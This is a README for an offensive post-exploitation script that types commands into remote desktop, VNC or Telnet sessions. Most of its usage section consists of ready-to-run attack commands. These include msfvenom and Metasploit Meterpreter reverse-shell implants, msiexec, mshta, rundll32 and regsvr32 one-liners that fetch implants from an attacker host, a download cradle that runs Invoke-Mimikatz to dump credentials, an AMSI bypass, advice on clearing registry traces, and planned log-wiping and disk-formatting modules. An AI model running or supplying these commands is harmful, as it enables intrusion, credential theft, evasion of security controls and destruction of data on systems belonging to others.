A script to automate keystrokes through an active remote desktop session that assists offensive operators in combination with living off the land techniques.
All credits goes to nopernik for making it possible so I took it upon myself to improve it. I wanted something that helps during the post exploitation phase when executing commands through a remote desktop. It was also possible for making the SCPA project for collecting resources in a organized matter.
- Executing commands
- File Transfer
- Privilege Escalation (Coming soon)
- Persistence (Coming soon)
- Anti-Forensics (Coming soon)
- Mayhem (Coming soon)
For Debian-based distros.
$ sudo apt install -y xfreerdp-x11 remmina xdotool
For RedHat-based distros.
$ sudo dnf install xdotool freerdp-2 remmina
For Arch-based distros.
$ sudo pacman -S freerdp remmina xdotool
For Gentoo-based distros.
$ sudo emerge freerdp remmina xdotool
For NixOS-based distros.
$ sudo nix-env -iA nixpkgs.xdotool nixpkgs.freerdp nixpkgs.remmina
This includes dependencies to compile kdotool. I tried to find the universal program to match window names but so far only KDE works.
For Debian-based distros.
$ sudo apt install -y freerdp2-wayland remmina libdbus-1-dev pkg-config libxkbcommon-dev libwayland-dev scdoc
For RedHat-based distros.
$ sudo dnf install freerdp-2 remmina dbus-devel pkg-config libxkbcommon-devel wayland-devel scdoc
For Arch-based distros.
$ sudo pacman -S --noconfirm freerdp remmina dbus pkg-config libxkbcommon wayland scdoc
For Gentoo-based distros.
$ sudo emerge freerdp remmina dbus pkg-config libxkbcommon wayland scdoc
For NixOS-based distros.
$ sudo nix-env -iA nixpkgs.freerdp nixpkgs.remmina nixpkgs.dbus nixpkgs.pkg-config nixpkgs.libxkbcommon nixpkgs.wayland nixpkgs.scdoc
Follow the instructions to install rust compiler.
$ curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh
Compile kdotool and install it to the system.
$ git clone https://github.com/jinliu/kdotool && cd kdotool && \
rustup default stable && cargo b -r && \
sudo cp target/release/kdotool /usr/local/bin/
Follow the instructions (click here) to install the go compiler. This is universal but limited to keystrokes and mouse input.
$ git clone https://git.sr.ht/~geb/dotool && cd dotool && \
./build.sh && sudo ./build.sh install
$ groupadd -f input
$ sudo usermod -aG input $USER
$ reboot
Install the program in the system and create rks as a symbolic link of remotekeystrokes. This will be used as an command alias.
$ sudo wget -O /usr/local/bin/remotekeystrokes https://raw.githubusercontent.com/U53RW4R3/RemoteKeyStrokes/main/remotekeystrokes.sh && \
sudo ln -sf /usr/local/bin/remotekeystrokes /usr/local/bin/rks && \
sudo chmod 755 /usr/local/bin/remotekeystrokes /usr/local/bin/rks
$ remotekeystrokes -h
Usage:
remotekeystrokes <flags>
Flags:
COMMON OPTIONS:
-c, --command <command | file> Specify a command or a file contains commands
to execute
-p, --platform <operating_system> Specify the operating system ("windows" is
set by default if not specified)
-w, --windowname <window_name> Specify the window name to focus on the
active window ("freerdp" is set by default
if not specified)
-h, --help Display this help message
UPLOAD FILES:
-i, --input <input_file> Specify the local input file to transfer
-o, --output <output_file> Specify the remote output file to transfer
METHODS:
-m, --method <method> Specify a method. For command execution method
"none" is set by default if not specified.
For file transfer "pwshb64" is set by default
if not specified. Other available methods are:
"elevate", "persistence", "antiforensics", and
"mayhem"
-s, --submethod <submethod> Specify a submethod from a method (applies
with -m flag)
-a, --action <action> Specify an action from a method and/or
submethod (applies with -m and/or -s flag)
-e, --evasion <evasion> Specify an evasion method for uploading files
(only works for "pwshb64")
-
Dollar sign (
$) indicates a unix shell prompt with normal user privileges, and it includes commands. -
Angle brackets (
<>) means mandatory parameters. -
Square brackets (
[]) means optional parameters if not required to specify.
To authenticate modern operating systems specify the flag either to force authentication as TLS /sec:tls or authentication as NLA /sec:nla.
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
To authenticate legacy operating systems specify the flag /sec:rdp to force old authentication.
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:rdp [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>]
To remotely authenticate a VNC machine.
$ remmina -c vnc://<username>:<password>@<IP>
$ ssh [-p <PORT>] <username>@<IP>
$ telnet <IP> [PORT]
To use remotekeystrokes (or an alias command rks) when executing commands on the Windows target with authenticated remote session. Before executing them you must navigate it with a window name (-w) by default it'll search for FreeRDP when using xfreerdp (for x11) or wlfreerdp (for wayland) if not specified. When targeting systems with a different remote login program be sure to specify the window name. Specify -c flag to issue commands. You can also prepare a text file to insert commands and it'll read them one by one. The flag will check if it's a string or a file.
For graphical remote desktop programs such as, FreeRDP, Remmina, and other third party programs. Unlike remote terminal sessions like telnet and ssh. You must navigate the cursor to an active application inside the target machine. For instance in Windows environment you must open a command prompt (cmd.exe) or powershell (powershell.exe). It is possible for Windows to open programs with a dialogue box (-m dialogbox) for a quick launch. Ensure to clear traces from the registry entry when you initially executed with the method. It's located in HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. You'll see examples of how you'll be able to perform quick offensive measures with just Living off the Land (LotL) techniques.
Local machine enumeration.
$ cat recon_local_enum_cmds.txt
whoami /all
net user
net localgroup Administrators
ipconfig /all
systeminfo
$ rks -c "cmd.exe" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!
$ rks -c recon_local_enum_cmds.txt
[PROG] Executing commands...
[DONE] Task completed!
To execute in a single command. This is concise especially when using with a dialbog box.
$ rks -c "cmd.exe /k \"whoami /all & net user & net localgroup Administrators & ipconfig /all & systeminfo\"" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!
Active directory enumeration.
$ cat recon_ad_enum_cmds.txt
net user /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Domain Computers" /domain
$ rks -c "cmd.exe" -m dialogbox
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!
$ rks -c recon_ad_enum_cmds.txt
[PROG] Executing commands...
[DONE] Task completed!
To execute in a single command. This is concise especially when using with a dialbog box.
$ rks -c "cmd.exe /k \"net user /domain & net group \"Domain Admins\" /domain & net group \"Enterprise Admins\" /domain & net group \"Domain Computers\" /domain\""
[INFO] Checking one of the lines reaches 260 character limit
[PROG] Executing commands...
[DONE] Task completed!
Local machine enumeration (TODO)
$ cat recon_local_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_local_enum_cmdlets.txt
Active directory enumeration (TODO)
$ cat recon_ad_enum_cmdlets.txt
$ rks -c "powershell.exe" -m dialogbox
$ rks -c recon_ad_enum_cmdlets.txt
Execute an implant while reading the contents of the payload in powershell.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f psh -o implant.ps1
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"
$ rks -c "powershell.exe" -m dialogbox
$ rks -c implant.ps1
Execute an powershell oneliner implant using metasploit-framework exploit module exploit/multi/script/web_delivery.
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "powershell.exe -nop -w hidden -e <base64_payload>"
Execute an implant with msiexec.exe while hosting a webserver.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<PORT> -f msi -o implant.msi
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport <PORT>; exploit"
$ sudo python -m http.server 80
$ rks -c "msiexec /quiet /qn /i http://<attacker_IP>/implant.msi" -m dialogbox
Execute an implant with mshta.exe using metasploit-framework exploit module exploit/windows/misc/hta_server.
$ sudo msfconsole -qx "use exploit/windows/misc/hta_server; set target 2; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvhost <server_IP>; set srvport <server_PORT> exploit"
$ rks -c "mshta.exe http://<attacker_IP>:<attacker_PORT>/implant.hta" -m dialogbox
Execute an implant with rundll32.exe using metasploit-framework exploit module exploit/windows/smb/smb_delivery.
$ sudo msfconsole -qx "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set file_name implant.dll; set share data; exploit"
$ rks -c "rundll32.exe \\<attacker_IP>\data\implant.dll,0" -m dialogbox
Execute an implant with regsvr32.exe using metasploit-framework exploit module exploit/multi/script/web_delivery.
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set target 3; set payload windows/x64/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"
$ rks -c "regsvr32 /s /n /u /i://http://<attacker_IP>:<attacker_PORT>/implant.sct scrobj.dll" -m dialogbox
Execute and implant with python using metasploit-framework exploit module exploit/multi/script/web_delivery.
$ sudo msfconsole -qx "use exploit/multi/script/web_delivery; set payload python/meterpreter/reverse_tcp; set lhost <IP>; set lport 8443; set srvhost <server_IP>; set srvport <server_PORT>; set uripath implant; exploit"
$ rks -c "python -c \"<payload>\""
There are 11 file transfer methods in total.
| Method | Platform | Description |
|---|---|---|
pwshb64 |
Windows and Linux | Encodes the file into base64 then decodes it with powershell. |
cmdb64 |
Windows | Uses copy con to output the encoded base64 file's content then decodes it with CertUtil.exe. |
nixb64 |
Unix | Decodes base64 content into a file. |
outfile |
Windows and Linux | Uses Out-File cmdlet to output the text file. |
outfileb64 |
Windows | Uses Out-File cmdlet to output the encoded base64 file's content then decodes it with CertUtil.exe. |
copycon |
Windows | Uses copy con command to output the text file. |
pwshhex |
Windows and Linux | Encodes the file into hexadecimal then decodes it with powershell. |
cmdhex |
Windows | Outputting a hex encoded one liner in a variable then decodes it with CertUtil.exe. |
copyconhex |
Windows | Uses copy con to output the encoded hexdump file's content then decodes it with CertUtil.exe. |
nixhex |
Unix | Outputting a hex encoded one liner in a variable then decodes with with echo -e to interpret the \x sequence character. This is suitable when dealing with IoT devices especially when Telnet lacks a feature to transfer files. |
outfilehex |
Windows | Uses Out-File cmdlet to output the encoded hexdump file's content then decodes it with CertUtil.exe. |
Upload a file remotely when pivoting in a isolated network. If you want to specify the remote path on windows be sure to include quotes. By default it uses Powershell base64 to transfer files if not specified. This also includes droppers even if the size is large. Bear in mind it'll take time to complete the file transfer.
$ rks -c "powershell.exe" -m dialogbox
$ rks -i Invoke-Mimikatz.ps1 -o "C:\Windows\Temp\update.ps1" -m pwshb64
[PROG] Transferring file...
[DONE] File transferred!
To transfer droppers you can use CertUtil.exe base64 especially if it's large.
$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=8443 -f exe -o implant.exe
To transfer droppers with powershell via CertUtil.exe base64.
$ rks -c "powershell.exe" -m dialogbox
$ rks -i implant.exe -o implant.exe -m outfileb64
It's also possible for legacy operating systems to transfer files such as, Windows XP that lacks powershell except for command prompt.
$ rks -c "cmd.exe" -m dialogbox
$ rks -i implant.exe -o implant.exe -m cmdb64
Activate your C2 listener and execute the implant.
$ sudo msfconsole -qx "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp set lhost <IP>; set lport 8443; exploit"
$ rks -c ".\implant.exe"
Another way to transfer files especially for sysadmin and offensive tools. Let's take PsExec64.exe as an example to requires us for lateral movement. It'll take a long time to upload via text without interruption. Instead the fastest way is to mount the WebDAV that belongs to the legitimate website of sysinternals suite toolkit (live.sysinternals.com). Instead of using the file explorer which is much slower than executing commands. Here are the commands for command prompt.
$ cat commands.txt
net use z: \\live.sysinternals.com\tools
copy z:\PsExec64.exe .
net use z: /delete
$ rks -c "cmd.exe" -m dialogbox
$ rks -c commands.txt
Here's another variant for powershell cmdlets when transferring PsExec64.exe in Windows.
$ cat cmdlets.txt
New-PSDrive -Name Z -PSProvider FileSystem -Root "\\live.sysinternals.com\tools"
Copy-Item z:\PsExec64.exe .
Remove-PSDrive -Name Z
$ rks -c "powershell.exe" -m dialogbox
$ rks -c cmdlets.txt
The best way to retrieve fileless malware or offensive tools through powershell is by simply hosting/retrieving legitimate websites such as, https://github.com and executing it. Let's use Invoke-Mimikatz to retrieve credentials downloading and executing the cradle from nishang.
$ cat hashdump.txt
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1')
Invoke-Mimikatz -DumpCreds
$ rks -c "powershell.exe" -m dialogbox
$ rks -c hashdump.txt
If you have large files that it's nearly impossible to wait for the file transfer to be finished. xfreerdp allows to mount a local directory with /drive:/path/to/directory/ flag. Then navigate the file browser or shell prompt to \\tsclient\<share_name>\ to view the contents.
$ mkdir Tools
$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe Tools/
$ xfreerdp /kbd:US /clipboard /compression /dynamic-resolution /sec:<tls | rdp | nla> [/d:"<domain_name>"] /u:"<username>" /p:"<password>" /v:<IP>:[<PORT>] /drive:Tools
$ rks -c "cmd.exe" -m dialogbox
$ rks -c "dir \\tsclient\<share_name>\"
Note: WIP (Work In Progress)
$ rks -m elevate -s bypassuac -a info
$ rks -m elevate -s <sub_method>
Note: WIP (Work In Progress)
$ rks -m persistence -s createuser
$ rks -m persistence -s sethc
Note: WIP (Work In Progress)
You can combine AMSI Bypass with the powershell implant to circumvent Windows Security or any security solution that was integrated with AMSI scanner.
$ cat amsi_bypass.ps1
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
$ cat amsi_bypass.ps1 implant.ps1 > payload.ps1
$ rks -c "powershell.exe" -m dialogbox
$ rks -c payload.ps1
$ rks -m antiforensics -s wevutils
$ rks -m antiforensics -s winevent
$ rks -m antiforensics -s eventvwr
Note: WIP (Work In Progress)
$ rks -m mayhem -s format -s diskpart -a info
$ rks -m mayhem -s format -s diskpart -a cmd
$ rks -m mayhem -s format -s diskpart -a pwsh
If you're targeting VNC, Telnet, or other network protocols you can specify the window name. This is useful whenever if you're using remmina or another terminal instance with a renamed window.
$ rks -c implant.ps1 -w <window_name>
It is painfully slow when I manually type with my keyboard or navigate and click with my mouse especially outside the local network. I just want to speed up the process especially when infiltrating the network.
Not necessarily. I made it possible for remote consoles such as, Telnet since it lacks a feature to transfer files.
The techniques are common and can be reused for BadUSB, malware development, or other projects related. It's under the copyleft license of the GNU GPLv3 that permits you as the user who have the right to view how the program operates, alter the source code to your requirements, and redistribute to other users along with the source code.
Yes and I found suitable programs to get it functional but it's limited to KDE desktop environment. I may have to reinvent in Go since dotool exists to makes my life easier find to focus the part related to match windows names.
To uninstall the programs.
$ sudo rm -f /usr/local/bin/remotekeystrokes /usr/local/bin/rks
To uninstall kdotool.
$ sudo rm /usr/local/bin/kdotool
To uninstall dotool.
$ cd dotool && sudo ./uninstall.sh
-
Implement encryption method of AES256 via base64
-
Implement the rest of upload methods: Base32, Base2, Base10, Base8
-
Implement privesc function for both windows and linux
-
Implement a persistence function for both windows and linux.
-
Implement antiforensics function for both windows and linux.
-
Implement mayhem function for both windows and linux.
It is your responsibility depending on whatever the cause of your actions user. Remember that with great power comes great responsibility.